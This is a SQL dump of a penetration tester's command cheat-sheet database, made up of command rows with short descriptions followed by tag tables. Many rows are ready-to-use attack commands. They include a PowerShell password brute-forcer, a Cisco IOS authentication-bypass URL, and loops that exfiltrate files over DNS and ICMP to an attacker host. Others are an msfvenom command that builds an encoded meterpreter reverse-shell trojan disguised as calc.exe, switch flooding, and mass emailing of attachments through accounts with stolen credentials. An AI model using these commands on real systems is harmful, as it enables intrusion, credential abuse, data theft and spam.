INSERT INTO "TblCommand" VALUES(367,'dsquery group "cn=users,dc=[domain],dc=[tld]"','List groups for domain.com','2017-02-04');
INSERT INTO "TblCommand" VALUES(368,'dsquery group -name "domain admins" | dsget group -members -expand ','Get Domain admins (prefer net groups "domain Admins")','2017-02-04');
INSERT INTO "TblCommand" VALUES(369,'dsquery user -name [user] | dsget user -memberof -expand','get groups for user (net groups [user])','2017-02-04');
INSERT INTO "TblCommand" VALUES(370,'dsquery user -name [user] | dsget user -samid','get user login name','2017-02-04');
INSERT INTO "TblCommand" VALUES(371,'dsquery user -inactive 2','List accounts that have been inactive for two weeks','2017-02-04');
INSERT INTO "TblCommand" VALUES(372,'dsquery * "DC=[domain],DC=[tld]" -scope subtree -attr "cn" "opperatingSystem"','List os''s in the domain','2017-02-04');
INSERT INTO "TblCommand" VALUES(373,'dsquery site -o rdn -limit 0','list site names','2017-02-04');
INSERT INTO "TblCommand" VALUES(374,'dsquery subnet -site [site] -o rdn','list subnets within the sites shown','2017-02-04');
INSERT INTO "TblCommand" VALUES(375,'dsquery server -site [site] -o rdn','list servers within site','2017-02-04');
INSERT INTO "TblCommand" VALUES(376,'host [domain]','list DC''s','2017-02-04');
INSERT INTO "TblCommand" VALUES(377,'https://hashcat.net/wiki/doku.php?id=example_hashes','hash list','2017-02-04');
INSERT INTO "TblCommand" VALUES(378,'Function Test-ADAuthentication {param($username,$password);echo "$username $password";(new-object directoryservices.directoryentry"",$username,$password).psbase.name -ne $null}; forEach ($userName in Get-Content "user_logins.txt"){Test-ADAuthentication $userName password >> test4.txt;}','Simple powershell brute force, user input list, checks the password ''password''','2017-02-04');
INSERT INTO "TblCommand" VALUES(379,'common ports','see /etc/services','2017-02-04');
INSERT INTO "TblCommand" VALUES(380,'TTL: 128 = Windows | 64 = linux | 255 = generic OR solaris','Networking Time to Live','2017-02-04');
INSERT INTO "TblCommand" VALUES(381,'Class Ip ranges : Go away, there was ABCDE. WAS AS IN NOT ANY MORE','Classfull networks have not existed since 1993 cisco GTFO with telling people they exist','2017-02-04');
INSERT INTO "TblCommand" VALUES(382,'Subnet ranges : /20 255.255.240.0 4096 hosts','please use ipcalc, there is no l33tness in doing it in your head','2017-02-04');
INSERT INTO "TblCommand" VALUES(383,'ipcalc -bnmp 10.0.0.1/20','Ip subnets','2017-02-04');
INSERT INTO "TblCommand" VALUES(384,'socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[RHOST]:[RPORT] ./[tool] 127.00.0.1:8080','Route IPV6 through ipv4 for things that dont support it','2017-02-04');
INSERT INTO "TblCommand" VALUES(385,'enable','raise privs cisco','2017-02-04');
INSERT INTO "TblCommand" VALUES(386,'conf t','start configuration','2017-02-04');
INSERT INTO "TblCommand" VALUES(387,'show session','show sessions','2017-02-04');
INSERT INTO "TblCommand" VALUES(388,'show version','show version','2017-02-04');
INSERT INTO "TblCommand" VALUES(389,'show running-config','show the config which is running in flash','2017-02-04');
INSERT INTO "TblCommand" VALUES(390,'show startup-config','show the config which runs on start up','2017-02-04');
INSERT INTO "TblCommand" VALUES(391,'show ip interface','show interface information : add breif for less','2017-02-04');
INSERT INTO "TblCommand" VALUES(392,'show ip route','show the routes of the switch ','2017-02-04');
INSERT INTO "TblCommand" VALUES(393,'show access-lists ','show the ACL for the switch','2017-02-04');
INSERT INTO "TblCommand" VALUES(394,'http://[ip]/level/56/exec/show/config','Bypass auth on ios 11.2-12.2','2017-02-04');
INSERT INTO "TblCommand" VALUES(395,'snmpwalk -c [pass] -v1 [victim]','Get snmp information about the host','2017-02-04');
INSERT INTO "TblCommand" VALUES(396,'file2cable -i eth0 -f [file]','replay packets to network','2017-02-04');
INSERT INTO "TblCommand" VALUES(397,'dnsrecon -t rvs -i 10.0.0.1,10.0.0.255','Reverse look up on range','2017-02-04');
INSERT INTO "TblCommand" VALUES(398,'dnsrecon -t std -d [domain]','brute names','2017-02-04');
INSERT INTO "TblCommand" VALUES(399,'dnsrecon -t axfr -d [domain]','do a zone transfer request (just use host . . .)','2017-02-04');
INSERT INTO "TblCommand" VALUES(400,'ftp -s ftp.txt','uninteractive FTP, read commands from file','2017-02-04');
INSERT INTO "TblCommand" VALUES(401,'for line in `base64 -w 230 [file]`; do host $line.[hostname]; done','exfil file through DNS, may want to encypt, assuming you have a short domain','2017-02-04');
INSERT INTO "TblCommand" VALUES(402,'for a in {a..z}; do for b in {a..z}; do for c in {a..z}; do for d in {a..z}; do whois $a$b.$c$d; done; done;done;done ','look for a free short domain, lol . . .','2017-02-04');
INSERT INTO "TblCommand" VALUES(403,'for line in `base64 -w 1000 [file]`; do ping -s 1000 -c 1 -M do [ip]; done','Exfil over icmp','2017-02-04');
INSERT INTO "TblCommand" VALUES(404,'fpipe.exe -l [lport] -r [rip] [ip]','forward local traffic htting lport to [rip]:[rport]','2017-02-04');
INSERT INTO "TblCommand" VALUES(405,'socat TCP4:LISTEN:[lport] TCP4:[rip]:[rport]','forward local traffic htting lport to [rip]:[rport]','2017-02-04');
INSERT INTO "TblCommand" VALUES(406,'stunnel : see XXX','SSL port tunnels in linux, IPS evasion','2017-02-04');
INSERT INTO "TblCommand" VALUES(407,'for i in {1..65000}; do echo 1 > /dev/tcp/[ip]/$i; echo $i; done','tcp port scanning from bash, just wireshark on the ip, usefull if you have cmd execution on web app','2017-02-04');
INSERT INTO "TblCommand" VALUES(408,'ssh -o StrictHostKeyChecking=no -t -t -i [private_key] -R [lport]:[rhost]:[rip] [user]@[ip]','ssh port forward [victim]:[port] to [ip]:[port], access by localhost:[port], rhost can be 127.0.0.1','2017-02-04');
INSERT INTO "TblCommand" VALUES(409,'plink.exe -N -i [private_key] -R [lport]:[rhost]:[rip] -l [user] [ip]','ssh port forward [victim]:[port] to [ip]:[port], access by localhost:[port], rhost can be 127.0.0.1','2017-02-04');
INSERT INTO "TblCommand" VALUES(410,'ssh -D [port] [user]@[ip]','set up a socks proxy','2017-02-04');
INSERT INTO "TblCommand" VALUES(411,'msfvenom --payload windows/meterpreter/reverse_tcp --format exe --template calc.exe -k --encoder x86/shikata_ga_ni -i 5 LHOST=[lhost] LPORT=[lport] evil.exe','create a evil calc','2017-02-04');
INSERT INTO "TblCommand" VALUES(412,'ettercap -TP rand_flood','try to make the switch fall over, and turn into a hub','2017-02-04');
INSERT INTO "TblCommand" VALUES(413,'hash lengths : MD5=16 | SHA1=20 | SHA256=32 | SHA512=64','Hash byte lengths','2017-02-04');
INSERT INTO "TblCommand" VALUES(414,'for i in *; do pdfinfo $i | egrep -i "Auth"; done | sort','generate user list from PDF''s, you can get more info to such as pdf maker','2017-02-04');
INSERT INTO "TblCommand" VALUES(415,'for i in `cat dets`; do echo "Sening Spam from $i"; mailx -s "Report Attached" -r "`echo $i | awk -F @ ''{print $1}''`<`echo $i | awk -F : ''{print $1}''`>" -a report.pdf -S smtp-auth=login -S smtp-auth-user="`echo $i | awk -F : ''{print $1}''`" -S smtp-auth-password="` echo $i | awk -F : ''{print $2}''`" -S ssl-verify=ignore -v -S smtp="10.11.1.229" [victim] < email;echo _________; done','Loop around ''dets'' (user:pass) and send an email through an authenticated mailserver with an attached file whos contents is stored in ''email''','2017-02-04');
INSERT INTO "TblCommand" VALUES(416,'https://gchq.github.io/CyberChef/','Common operations on data','2017-02-04');
CREATE TABLE TblTagContent(
TagID INTEGER PRIMARY KEY,
Tag TEXT NOT NULL
);
INSERT INTO "TblTagContent" VALUES(0,'Linux');
INSERT INTO "TblTagContent" VALUES(1,'Windows');
INSERT INTO "TblTagContent" VALUES(2,'Files');
INSERT INTO "TblTagContent" VALUES(3,'loop');
INSERT INTO "TblTagContent" VALUES(4,'smb');
INSERT INTO "TblTagContent" VALUES(5,'bash');
INSERT INTO "TblTagContent" VALUES(6,'cisco');
INSERT INTO "TblTagContent" VALUES(7,'networking');
INSERT INTO "TblTagContent" VALUES(8,'passwords');
INSERT INTO "TblTagContent" VALUES(9,'interesting');
INSERT INTO "TblTagContent" VALUES(10,'hp');
INSERT INTO "TblTagContent" VALUES(11,'brute');
INSERT INTO "TblTagContent" VALUES(12,'http');
INSERT INTO "TblTagContent" VALUES(13,'web application');
INSERT INTO "TblTagContent" VALUES(14,'XSS');
INSERT INTO "TblTagContent" VALUES(15,'cookies');
INSERT INTO "TblTagContent" VALUES(16,'metasploit');
INSERT INTO "TblTagContent" VALUES(17,'scanning');
INSERT INTO "TblTagContent" VALUES(18,'certificates');
INSERT INTO "TblTagContent" VALUES(19,'stealth');
INSERT INTO "TblTagContent" VALUES(20,'MitM');
INSERT INTO "TblTagContent" VALUES(21,'dns');
INSERT INTO "TblTagContent" VALUES(22,'package management');
INSERT INTO "TblTagContent" VALUES(23,'text manipulation');
INSERT INTO "TblTagContent" VALUES(24,'reverse shells');
INSERT INTO "TblTagContent" VALUES(25,'perl');
INSERT INTO "TblTagContent" VALUES(26,'python');
INSERT INTO "TblTagContent" VALUES(27,'php');
INSERT INTO "TblTagContent" VALUES(28,'ruby');
INSERT INTO "TblTagContent" VALUES(29,'sql injection');
INSERT INTO "TblTagContent" VALUES(30,'mssql');
INSERT INTO "TblTagContent" VALUES(31,'Oracle');
INSERT INTO "TblTagContent" VALUES(32,'mysql');
INSERT INTO "TblTagContent" VALUES(33,'enumeration');
INSERT INTO "TblTagContent" VALUES(34,'windows ');
INSERT INTO "TblTagContent" VALUES(35,'users');
INSERT INTO "TblTagContent" VALUES(36,'wireless');
INSERT INTO "TblTagContent" VALUES(37,'wifi');
INSERT INTO "TblTagContent" VALUES(38,'web appplication');
INSERT INTO "TblTagContent" VALUES(39,'av evasion');
INSERT INTO "TblTagContent" VALUES(40,'powershell');
INSERT INTO "TblTagContent" VALUES(41,'memory');
INSERT INTO "TblTagContent" VALUES(42,'user information');
INSERT INTO "TblTagContent" VALUES(43,'filesystem');
INSERT INTO "TblTagContent" VALUES(44,'IIS');
INSERT INTO "TblTagContent" VALUES(45,'pivoting');
INSERT INTO "TblTagContent" VALUES(46,'process management');
INSERT INTO "TblTagContent" VALUES(47,'remote command shell');
INSERT INTO "TblTagContent" VALUES(48,'hashes');
INSERT INTO "TblTagContent" VALUES(49,'impacket');
INSERT INTO "TblTagContent" VALUES(50,'privilege escalation');
INSERT INTO "TblTagContent" VALUES(51,'cracking');
INSERT INTO "TblTagContent" VALUES(52,'nessus');
INSERT INTO "TblTagContent" VALUES(53,'recon');
INSERT INTO "TblTagContent" VALUES(54,'referance');
INSERT INTO "TblTagContent" VALUES(55,'subnets');
INSERT INTO "TblTagContent" VALUES(56,'packet capture');
INSERT INTO "TblTagContent" VALUES(57,'web address');
INSERT INTO "TblTagContent" VALUES(58,'configuration');
INSERT INTO "TblTagContent" VALUES(59,'java');
INSERT INTO "TblTagContent" VALUES(60,'forensics');
INSERT INTO "TblTagContent" VALUES(61,'solaris');
CREATE TABLE TblTagMap(
ID INTEGER PRIMARY KEY,
TagID INT NOT NULL,
CmdID INT NOT NULL
);
INSERT INTO "TblTagMap" VALUES(0,0,0);
INSERT INTO "TblTagMap" VALUES(1,0,1);
INSERT INTO "TblTagMap" VALUES(2,3,1);
INSERT INTO "TblTagMap" VALUES(3,4,1);
INSERT INTO "TblTagMap" VALUES(4,0,2);
INSERT INTO "TblTagMap" VALUES(5,5,2);
INSERT INTO "TblTagMap" VALUES(6,5,3);
INSERT INTO "TblTagMap" VALUES(7,0,3);
INSERT INTO "TblTagMap" VALUES(8,5,4);
INSERT INTO "TblTagMap" VALUES(9,0,4);
INSERT INTO "TblTagMap" VALUES(10,5,5);
INSERT INTO "TblTagMap" VALUES(11,0,5);
INSERT INTO "TblTagMap" VALUES(12,5,6);
INSERT INTO "TblTagMap" VALUES(13,0,6);
INSERT INTO "TblTagMap" VALUES(14,6,7);
INSERT INTO "TblTagMap" VALUES(15,6,8);
INSERT INTO "TblTagMap" VALUES(16,7,8);
INSERT INTO "TblTagMap" VALUES(17,5,9);
INSERT INTO "TblTagMap" VALUES(18,0,10);
INSERT INTO "TblTagMap" VALUES(19,5,10);
INSERT INTO "TblTagMap" VALUES(20,0,11);
INSERT INTO "TblTagMap" VALUES(21,5,11);
INSERT INTO "TblTagMap" VALUES(22,0,12);
INSERT INTO "TblTagMap" VALUES(23,5,12);
INSERT INTO "TblTagMap" VALUES(24,2,12);
INSERT INTO "TblTagMap" VALUES(25,0,13);
INSERT INTO "TblTagMap" VALUES(26,0,14);
INSERT INTO "TblTagMap" VALUES(27,5,14);
INSERT INTO "TblTagMap" VALUES(28,7,15);
INSERT INTO "TblTagMap" VALUES(29,0,15);
INSERT INTO "TblTagMap" VALUES(30,5,15);
INSERT INTO "TblTagMap" VALUES(31,0,16);
INSERT INTO "TblTagMap" VALUES(32,5,16);
INSERT INTO "TblTagMap" VALUES(33,2,16);
INSERT INTO "TblTagMap" VALUES(34,0,17);
INSERT INTO "TblTagMap" VALUES(35,8,17);
INSERT INTO "TblTagMap" VALUES(36,5,17);
INSERT INTO "TblTagMap" VALUES(37,3,18);
INSERT INTO "TblTagMap" VALUES(38,0,18);
INSERT INTO "TblTagMap" VALUES(39,5,18);
INSERT INTO "TblTagMap" VALUES(40,9,18);
INSERT INTO "TblTagMap" VALUES(41,0,19);
INSERT INTO "TblTagMap" VALUES(42,7,20);
INSERT INTO "TblTagMap" VALUES(43,5,20);
INSERT INTO "TblTagMap" VALUES(44,0,20);
INSERT INTO "TblTagMap" VALUES(45,0,21);
INSERT INTO "TblTagMap" VALUES(46,7,21);
INSERT INTO "TblTagMap" VALUES(47,5,21);
INSERT INTO "TblTagMap" VALUES(48,0,22);
INSERT INTO "TblTagMap" VALUES(49,7,22);
INSERT INTO "TblTagMap" VALUES(50,5,22);
INSERT INTO "TblTagMap" VALUES(51,0,23);
INSERT INTO "TblTagMap" VALUES(52,7,23);
INSERT INTO "TblTagMap" VALUES(53,5,23);
INSERT INTO "TblTagMap" VALUES(54,0,24);
INSERT INTO "TblTagMap" VALUES(55,7,24);
INSERT INTO "TblTagMap" VALUES(56,5,24);
INSERT INTO "TblTagMap" VALUES(57,0,25);
INSERT INTO "TblTagMap" VALUES(58,7,25);
INSERT INTO "TblTagMap" VALUES(59,5,25);
INSERT INTO "TblTagMap" VALUES(60,0,26);
INSERT INTO "TblTagMap" VALUES(61,7,26);
INSERT INTO "TblTagMap" VALUES(62,5,26);
INSERT INTO "TblTagMap" VALUES(63,0,27);
INSERT INTO "TblTagMap" VALUES(64,7,27);
INSERT INTO "TblTagMap" VALUES(65,5,27);
INSERT INTO "TblTagMap" VALUES(66,0,28);
INSERT INTO "TblTagMap" VALUES(67,7,28);
INSERT INTO "TblTagMap" VALUES(68,5,28);
INSERT INTO "TblTagMap" VALUES(69,0,29);
INSERT INTO "TblTagMap" VALUES(70,7,29);
INSERT INTO "TblTagMap" VALUES(71,5,29);
INSERT INTO "TblTagMap" VALUES(72,9,29);
INSERT INTO "TblTagMap" VALUES(73,10,30);
INSERT INTO "TblTagMap" VALUES(74,7,30);
INSERT INTO "TblTagMap" VALUES(75,0,31);
INSERT INTO "TblTagMap" VALUES(76,5,31);
INSERT INTO "TblTagMap" VALUES(77,11,32);
INSERT INTO "TblTagMap" VALUES(78,0,32);
INSERT INTO "TblTagMap" VALUES(79,12,32);
INSERT INTO "TblTagMap" VALUES(80,5,33);
INSERT INTO "TblTagMap" VALUES(81,0,33);
INSERT INTO "TblTagMap" VALUES(82,13,34);
INSERT INTO "TblTagMap" VALUES(83,14,34);
INSERT INTO "TblTagMap" VALUES(84,15,34);
INSERT INTO "TblTagMap" VALUES(85,16,35);
INSERT INTO "TblTagMap" VALUES(86,7,36);
INSERT INTO "TblTagMap" VALUES(87,17,36);
INSERT INTO "TblTagMap" VALUES(88,7,37);
INSERT INTO "TblTagMap" VALUES(89,17,37);
INSERT INTO "TblTagMap" VALUES(90,7,38);
INSERT INTO "TblTagMap" VALUES(91,17,38);
INSERT INTO "TblTagMap" VALUES(92,7,39);
INSERT INTO "TblTagMap" VALUES(93,17,39);
INSERT INTO "TblTagMap" VALUES(94,7,40);
INSERT INTO "TblTagMap" VALUES(95,17,40);
INSERT INTO "TblTagMap" VALUES(96,7,41);
INSERT INTO "TblTagMap" VALUES(97,17,41);
INSERT INTO "TblTagMap" VALUES(98,18,42);
INSERT INTO "TblTagMap" VALUES(99,0,42);
INSERT INTO "TblTagMap" VALUES(100,5,42);
INSERT INTO "TblTagMap" VALUES(101,18,43);
INSERT INTO "TblTagMap" VALUES(102,0,43);
INSERT INTO "TblTagMap" VALUES(103,5,43);
INSERT INTO "TblTagMap" VALUES(104,18,44);
INSERT INTO "TblTagMap" VALUES(105,0,44);
INSERT INTO "TblTagMap" VALUES(106,5,44);
INSERT INTO "TblTagMap" VALUES(107,7,45);
INSERT INTO "TblTagMap" VALUES(108,0,45);
INSERT INTO "TblTagMap" VALUES(109,5,45);
INSERT INTO "TblTagMap" VALUES(110,0,46);
INSERT INTO "TblTagMap" VALUES(111,7,46);
INSERT INTO "TblTagMap" VALUES(112,5,46);
INSERT INTO "TblTagMap" VALUES(113,19,46);
INSERT INTO "TblTagMap" VALUES(114,0,47);
INSERT INTO "TblTagMap" VALUES(115,7,47);
INSERT INTO "TblTagMap" VALUES(116,5,47);
INSERT INTO "TblTagMap" VALUES(117,17,48);
INSERT INTO "TblTagMap" VALUES(118,13,48);
INSERT INTO "TblTagMap" VALUES(119,13,49);
INSERT INTO "TblTagMap" VALUES(120,5,49);
INSERT INTO "TblTagMap" VALUES(121,0,49);
INSERT INTO "TblTagMap" VALUES(122,5,50);
INSERT INTO "TblTagMap" VALUES(123,0,50);
INSERT INTO "TblTagMap" VALUES(124,13,50);
INSERT INTO "TblTagMap" VALUES(125,4,51);
INSERT INTO "TblTagMap" VALUES(126,0,51);
INSERT INTO "TblTagMap" VALUES(127,5,51);
INSERT INTO "TblTagMap" VALUES(128,17,52);
INSERT INTO "TblTagMap" VALUES(129,0,52);
INSERT INTO "TblTagMap" VALUES(130,5,52);
INSERT INTO "TblTagMap" VALUES(131,11,52);
INSERT INTO "TblTagMap" VALUES(132,7,53);
INSERT INTO "TblTagMap" VALUES(133,0,53);
INSERT INTO "TblTagMap" VALUES(134,20,53);
INSERT INTO "TblTagMap" VALUES(135,17,54);
INSERT INTO "TblTagMap" VALUES(136,21,54);
INSERT INTO "TblTagMap" VALUES(137,7,54);
INSERT INTO "TblTagMap" VALUES(138,0,54);
INSERT INTO "TblTagMap" VALUES(139,5,55);
INSERT INTO "TblTagMap" VALUES(140,0,55);
INSERT INTO "TblTagMap" VALUES(141,9,55);
INSERT INTO "TblTagMap" VALUES(142,5,56);
INSERT INTO "TblTagMap" VALUES(143,22,56);
INSERT INTO "TblTagMap" VALUES(144,0,56);
INSERT INTO "TblTagMap" VALUES(145,5,57);
INSERT INTO "TblTagMap" VALUES(146,0,57);
INSERT INTO "TblTagMap" VALUES(147,23,57);
INSERT INTO "TblTagMap" VALUES(148,5,58);
INSERT INTO "TblTagMap" VALUES(149,0,58);
INSERT INTO "TblTagMap" VALUES(150,23,58);
INSERT INTO "TblTagMap" VALUES(151,5,59);
INSERT INTO "TblTagMap" VALUES(152,0,59);
INSERT INTO "TblTagMap" VALUES(153,23,59);
INSERT INTO "TblTagMap" VALUES(154,23,60);
INSERT INTO "TblTagMap" VALUES(155,0,60);
INSERT INTO "TblTagMap" VALUES(156,5,60);
INSERT INTO "TblTagMap" VALUES(157,5,61);
INSERT INTO "TblTagMap" VALUES(158,24,61);
INSERT INTO "TblTagMap" VALUES(159,0,61);
INSERT INTO "TblTagMap" VALUES(160,25,62);
INSERT INTO "TblTagMap" VALUES(161,0,62);
INSERT INTO "TblTagMap" VALUES(162,1,62);
INSERT INTO "TblTagMap" VALUES(163,24,62);
INSERT INTO "TblTagMap" VALUES(164,26,63);
INSERT INTO "TblTagMap" VALUES(165,24,63);
INSERT INTO "TblTagMap" VALUES(166,0,63);
INSERT INTO "TblTagMap" VALUES(167,1,63);
INSERT INTO "TblTagMap" VALUES(168,27,64);
INSERT INTO "TblTagMap" VALUES(169,24,64);
INSERT INTO "TblTagMap" VALUES(170,0,64);
INSERT INTO "TblTagMap" VALUES(171,1,64);
INSERT INTO "TblTagMap" VALUES(172,28,65);
INSERT INTO "TblTagMap" VALUES(173,0,65);
INSERT INTO "TblTagMap" VALUES(174,1,65);
INSERT INTO "TblTagMap" VALUES(175,24,65);
INSERT INTO "TblTagMap" VALUES(176,24,66);
INSERT INTO "TblTagMap" VALUES(177,0,66);
INSERT INTO "TblTagMap" VALUES(178,1,66);
INSERT INTO "TblTagMap" VALUES(179,29,67);
INSERT INTO "TblTagMap" VALUES(180,13,67);
INSERT INTO "TblTagMap" VALUES(181,29,68);
INSERT INTO "TblTagMap" VALUES(182,30,68);
INSERT INTO "TblTagMap" VALUES(183,13,68);
INSERT INTO "TblTagMap" VALUES(184,29,69);
INSERT INTO "TblTagMap" VALUES(185,31,69);
INSERT INTO "TblTagMap" VALUES(186,13,69);
INSERT INTO "TblTagMap" VALUES(187,29,70);
INSERT INTO "TblTagMap" VALUES(188,13,70);
INSERT INTO "TblTagMap" VALUES(189,32,70);
INSERT INTO "TblTagMap" VALUES(190,30,71);
INSERT INTO "TblTagMap" VALUES(191,29,71);
INSERT INTO "TblTagMap" VALUES(192,13,71);
INSERT INTO "TblTagMap" VALUES(193,2,72);
INSERT INTO "TblTagMap" VALUES(194,5,72);
INSERT INTO "TblTagMap" VALUES(195,9,72);
INSERT INTO "TblTagMap" VALUES(196,23,72);
INSERT INTO "TblTagMap" VALUES(197,33,73);
INSERT INTO "TblTagMap" VALUES(198,1,73);
INSERT INTO "TblTagMap" VALUES(199,33,74);
INSERT INTO "TblTagMap" VALUES(200,1,74);
INSERT INTO "TblTagMap" VALUES(201,34,75);
INSERT INTO "TblTagMap" VALUES(202,33,75);
INSERT INTO "TblTagMap" VALUES(203,35,75);
INSERT INTO "TblTagMap" VALUES(204,36,76);
INSERT INTO "TblTagMap" VALUES(205,37,76);
INSERT INTO "TblTagMap" VALUES(206,11,76);
INSERT INTO "TblTagMap" VALUES(207,13,77);
INSERT INTO "TblTagMap" VALUES(208,14,77);
INSERT INTO "TblTagMap" VALUES(209,38,78);
INSERT INTO "TblTagMap" VALUES(210,14,78);
INSERT INTO "TblTagMap" VALUES(211,13,79);
INSERT INTO "TblTagMap" VALUES(212,14,79);
INSERT INTO "TblTagMap" VALUES(213,9,80);
INSERT INTO "TblTagMap" VALUES(214,5,80);
INSERT INTO "TblTagMap" VALUES(215,0,80);
INSERT INTO "TblTagMap" VALUES(216,5,81);
INSERT INTO "TblTagMap" VALUES(217,0,81);
INSERT INTO "TblTagMap" VALUES(218,0,82);
INSERT INTO "TblTagMap" VALUES(219,36,82);
INSERT INTO "TblTagMap" VALUES(220,37,82);
INSERT INTO "TblTagMap" VALUES(221,36,83);
INSERT INTO "TblTagMap" VALUES(222,37,83);
INSERT INTO "TblTagMap" VALUES(223,33,83);
INSERT INTO "TblTagMap" VALUES(224,7,84);
INSERT INTO "TblTagMap" VALUES(225,0,84);
INSERT INTO "TblTagMap" VALUES(226,36,84);
INSERT INTO "TblTagMap" VALUES(227,37,84);
INSERT INTO "TblTagMap" VALUES(228,17,85);
INSERT INTO "TblTagMap" VALUES(229,1,85);
INSERT INTO "TblTagMap" VALUES(230,7,85);
INSERT INTO "TblTagMap" VALUES(231,13,86);
INSERT INTO "TblTagMap" VALUES(232,9,86);
INSERT INTO "TblTagMap" VALUES(233,5,86);
INSERT INTO "TblTagMap" VALUES(234,23,86);
INSERT INTO "TblTagMap" VALUES(235,14,87);
INSERT INTO "TblTagMap" VALUES(236,13,87);
INSERT INTO "TblTagMap" VALUES(237,16,88);
INSERT INTO "TblTagMap" VALUES(238,39,88);
INSERT INTO "TblTagMap" VALUES(239,1,89);
INSERT INTO "TblTagMap" VALUES(240,33,90);
INSERT INTO "TblTagMap" VALUES(241,1,90);
INSERT INTO "TblTagMap" VALUES(242,40,91);
INSERT INTO "TblTagMap" VALUES(243,1,91);
INSERT INTO "TblTagMap" VALUES(244,40,92);
INSERT INTO "TblTagMap" VALUES(245,1,92);
INSERT INTO "TblTagMap" VALUES(246,3,93);
INSERT INTO "TblTagMap" VALUES(247,33,93);
INSERT INTO "TblTagMap" VALUES(248,5,93);
INSERT INTO "TblTagMap" VALUES(249,4,93);
INSERT INTO "TblTagMap" VALUES(250,40,94);
INSERT INTO "TblTagMap" VALUES(251,1,94);
INSERT INTO "TblTagMap" VALUES(252,8,94);
INSERT INTO "TblTagMap" VALUES(253,39,94);
INSERT INTO "TblTagMap" VALUES(254,1,95);
INSERT INTO "TblTagMap" VALUES(255,41,95);
INSERT INTO "TblTagMap" VALUES(256,0,96);
INSERT INTO "TblTagMap" VALUES(257,3,97);
INSERT INTO "TblTagMap" VALUES(258,4,97);
INSERT INTO "TblTagMap" VALUES(259,33,97);
INSERT INTO "TblTagMap" VALUES(260,42,97);
INSERT INTO "TblTagMap" VALUES(261,1,98);
INSERT INTO "TblTagMap" VALUES(262,40,98);
INSERT INTO "TblTagMap" VALUES(263,33,98);
INSERT INTO "TblTagMap" VALUES(264,21,99);
INSERT INTO "TblTagMap" VALUES(265,33,99);
INSERT INTO "TblTagMap" VALUES(266,1,99);
INSERT INTO "TblTagMap" VALUES(267,0,100);
INSERT INTO "TblTagMap" VALUES(268,2,100);
INSERT INTO "TblTagMap" VALUES(269,43,100);
INSERT INTO "TblTagMap" VALUES(270,33,101);
INSERT INTO "TblTagMap" VALUES(271,0,101);
INSERT INTO "TblTagMap" VALUES(272,4,101);
INSERT INTO "TblTagMap" VALUES(273,3,102);
INSERT INTO "TblTagMap" VALUES(274,33,102);
INSERT INTO "TblTagMap" VALUES(275,7,102);
INSERT INTO "TblTagMap" VALUES(276,3,103);
INSERT INTO "TblTagMap" VALUES(277,1,103);
INSERT INTO "TblTagMap" VALUES(278,0,103);
INSERT INTO "TblTagMap" VALUES(279,33,103);
INSERT INTO "TblTagMap" VALUES(280,42,103);
INSERT INTO "TblTagMap" VALUES(281,3,104);
INSERT INTO "TblTagMap" VALUES(282,5,104);
INSERT INTO "TblTagMap" VALUES(283,23,104);
INSERT INTO "TblTagMap" VALUES(284,9,104);
INSERT INTO "TblTagMap" VALUES(285,0,104);
INSERT INTO "TblTagMap" VALUES(286,42,104);
INSERT INTO "TblTagMap" VALUES(287,0,105);
INSERT INTO "TblTagMap" VALUES(288,30,105);
INSERT INTO "TblTagMap" VALUES(289,0,106);
INSERT INTO "TblTagMap" VALUES(290,30,106);
INSERT INTO "TblTagMap" VALUES(291,1,107);
INSERT INTO "TblTagMap" VALUES(292,33,107);
INSERT INTO "TblTagMap" VALUES(293,44,107);
INSERT INTO "TblTagMap" VALUES(294,8,107);
INSERT INTO "TblTagMap" VALUES(295,33,108);
INSERT INTO "TblTagMap" VALUES(296,1,108);
INSERT INTO "TblTagMap" VALUES(297,1,109);
INSERT INTO "TblTagMap" VALUES(298,7,109);
INSERT INTO "TblTagMap" VALUES(299,7,110);
INSERT INTO "TblTagMap" VALUES(300,45,110);
INSERT INTO "TblTagMap" VALUES(301,1,110);
INSERT INTO "TblTagMap" VALUES(302,1,111);
INSERT INTO "TblTagMap" VALUES(303,7,111);
INSERT INTO "TblTagMap" VALUES(304,45,111);
INSERT INTO "TblTagMap" VALUES(305,1,112);
INSERT INTO "TblTagMap" VALUES(306,33,112);
INSERT INTO "TblTagMap" VALUES(307,1,113);
INSERT INTO "TblTagMap" VALUES(308,33,113);
INSERT INTO "TblTagMap" VALUES(309,1,114);
INSERT INTO "TblTagMap" VALUES(310,33,114);
INSERT INTO "TblTagMap" VALUES(311,46,114);
INSERT INTO "TblTagMap" VALUES(312,1,115);
INSERT INTO "TblTagMap" VALUES(313,46,115);
INSERT INTO "TblTagMap" VALUES(314,1,116);
INSERT INTO "TblTagMap" VALUES(315,7,116);
INSERT INTO "TblTagMap" VALUES(316,33,116);
INSERT INTO "TblTagMap" VALUES(317,1,117);
INSERT INTO "TblTagMap" VALUES(318,33,117);
INSERT INTO "TblTagMap" VALUES(319,2,117);
INSERT INTO "TblTagMap" VALUES(320,1,118);
INSERT INTO "TblTagMap" VALUES(321,0,119);
INSERT INTO "TblTagMap" VALUES(322,5,119);
INSERT INTO "TblTagMap" VALUES(323,3,120);
INSERT INTO "TblTagMap" VALUES(324,0,120);
INSERT INTO "TblTagMap" VALUES(325,1,120);
INSERT INTO "TblTagMap" VALUES(326,47,120);
INSERT INTO "TblTagMap" VALUES(327,48,121);
INSERT INTO "TblTagMap" VALUES(328,47,121);
INSERT INTO "TblTagMap" VALUES(329,0,121);
INSERT INTO "TblTagMap" VALUES(330,1,121);
INSERT INTO "TblTagMap" VALUES(331,49,121);
INSERT INTO "TblTagMap" VALUES(332,33,122);
INSERT INTO "TblTagMap" VALUES(333,0,122);
INSERT INTO "TblTagMap" VALUES(334,1,122);
INSERT INTO "TblTagMap" VALUES(335,4,122);
INSERT INTO "TblTagMap" VALUES(336,42,122);
INSERT INTO "TblTagMap" VALUES(337,18,123);
INSERT INTO "TblTagMap" VALUES(338,5,123);
INSERT INTO "TblTagMap" VALUES(339,0,123);
INSERT INTO "TblTagMap" VALUES(340,33,124);
INSERT INTO "TblTagMap" VALUES(341,1,124);
INSERT INTO "TblTagMap" VALUES(342,1,125);
INSERT INTO "TblTagMap" VALUES(343,33,125);
INSERT INTO "TblTagMap" VALUES(344,1,126);
INSERT INTO "TblTagMap" VALUES(345,33,126);
INSERT INTO "TblTagMap" VALUES(346,50,126);
INSERT INTO "TblTagMap" VALUES(347,1,127);
INSERT INTO "TblTagMap" VALUES(348,33,127);
INSERT INTO "TblTagMap" VALUES(349,50,127);
INSERT INTO "TblTagMap" VALUES(350,1,128);
